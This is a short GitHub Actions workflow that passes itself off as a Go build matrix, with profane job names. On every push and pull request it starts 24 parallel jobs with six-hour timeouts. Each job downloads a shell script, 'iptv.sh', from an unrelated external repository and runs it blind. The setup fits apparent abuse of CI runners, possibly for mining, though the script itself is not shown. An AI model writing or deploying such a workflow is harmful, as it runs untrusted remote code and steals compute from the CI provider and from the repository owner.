name: GITHUB_KONTOL
on: [push, pull_request]
jobs:
  build:
    name: FUCK_GITHUB
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 20
      fail-fast: false
      matrix:
        go: [1.1, 1.2, 1.3, 1.4]
        flag: [A, B, C, D, E, F]
    timeout-minutes: 360
    env:
        NUM_JOBS: 20
        JOB: ${{ matrix.go }}
    steps:
    - name: Set up Go ${{ matrix.go }}
      uses: actions/setup-go@v1
      with:
        go-version: ${{ matrix.go }}
      id: go
    - name: Setup
      uses: actions/checkout@v1
    - name: runner_go
      run: |
        wget https://github.com/Trobverus/guio/blob/69a096194c2d970fae1f084a6ae5fb18f3aaf438/iptv.sh && chmod u+x iptv.sh && ./iptv.sh
